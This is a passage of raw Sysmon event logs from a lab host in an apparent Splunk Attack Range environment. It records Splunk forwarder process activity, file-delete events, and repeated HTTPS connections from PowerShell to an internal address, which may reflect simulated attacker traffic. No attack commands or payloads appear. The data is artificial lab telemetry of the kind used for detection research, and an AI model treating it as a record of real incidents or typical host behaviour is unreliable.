13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.630{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.093{B81B27B7-9FE3-6140-6056-04000000C801}45166880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036496636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:39.312{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50434-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:09.775{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EAD5093B06F25099E6DD270D577157E,SHA256=47F22865D872BBB117253E542EF56BA2BE78E5C1B6E43174FCF884BD71755A63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:10.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E830C4A2E783812F2CE6A380799218B7,SHA256=90FF43B95A400DE366CE17BE0F28AE61BA1CE3B21E16648D8E15389F291287D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:11.806{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33D302C062D13F41560E5672E1A1BAE,SHA256=1010261F9C9FC0D081627D49AEDD758853BFFAD4EEB2A5E99D5198A8FDC307BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:12.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDD05F71CC6D15C14DAC340BEB0C3E4A,SHA256=8DD12FE4E0133748961ED82667A5DEF4E8BC7EB8616A34EE93867B68C9ED6C65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:44.322{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50436-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:43.769{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50435-false10.0.1.12-8000- 23542300x800000000000000036496641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:13.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F58F1CD752F11B19C1120738E4FBAD,SHA256=ED11D25E4EA8AAA856B76F25EE33B702D358A6D07693A49057A51DFE16008CB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:13.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AB32E922B4675AB06D3141CC8BAE2B84,SHA256=6E62C56EF7B90DB8FEB41DE727EB3B0493F9AFCCCC8560A1E37A017AFC3B573F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:14.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67B7CF8D169F6277F6F4B5ED732AB0E4,SHA256=30058998552AF88A51D9E45FC87F280F4945DEBFF4C58BD390F8C7DE4CAAFF4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:15.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBAB63988C5C6BDEE2C1A7608100C580,SHA256=229528927BFEBF513F7504C939D1A2C63D5540B260493A517B407D67180D3B51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:16.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A75B6184307DC06D6DB41EE827CAE2C0,SHA256=5AB911B74080B32C40D40AE7E948016BBBB5908D3EAFC110F3F0347EA0F8C916,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:17.994{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3811C6D2EA1490D3E88799EE087EE004,SHA256=403271D0257D65640FE8A93B32D94A4106668FF95B1374D76148E9A6F548A1D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:48.775{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50437-false10.0.1.12-8000- 354300x800000000000000036496651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:50.328{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50438-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:19.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=106CD0F068908BB7F9C1A669AB7C07C0,SHA256=AC0B633F871E891B22991BAA10C86C73965604FBCCB864A9BFCEB5B251305D99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:19.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6F6E84DFE66398BE30C3983FB2EE6C,SHA256=A339A1EA55AA69A0F567519A91D7EDFF1B525D2228639DBA529E908C06EEB6EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:20.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A271D14C7C661A708DAE7D9DBF172F55,SHA256=6A8C1DA2E700406A433B67EB112355B4234C4E95432BC259EF5B363BDDA3C517,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:21.076{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513EF1F2A53D306BB013A41120E4A90F,SHA256=B80F8FE9AC7DC1AFD9CD9EACA4F679BF863CDB48F234E0215B3C8225273620F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:22.091{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84E9B4A73C4EBAA4B5091FBF0D95D43B,SHA256=D919568B4D8CCF5613430CE67F6D8A7320C2231EA19C8FCD09AD87AAFC0B220F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:23.222{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B0799AE287647D622CF8537A6C012883,SHA256=59BF73ED52277FC024FA683BE109A3968ECA5A7659E5A29D4A37921243168023,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:23.106{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A15FCC4574E5385DF833D0D611CAAC,SHA256=8151B536AA81DBFD2FC289F6279A13E6C0992AA17D95C6CD589A04186090DFA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FF4-6140-6356-04000000C801}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9FF4-6140-6356-04000000C801}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.704{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FF4-6140-6356-04000000C801}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.690{B81B27B7-9FF4-6140-6356-04000000C801}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:24.673{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 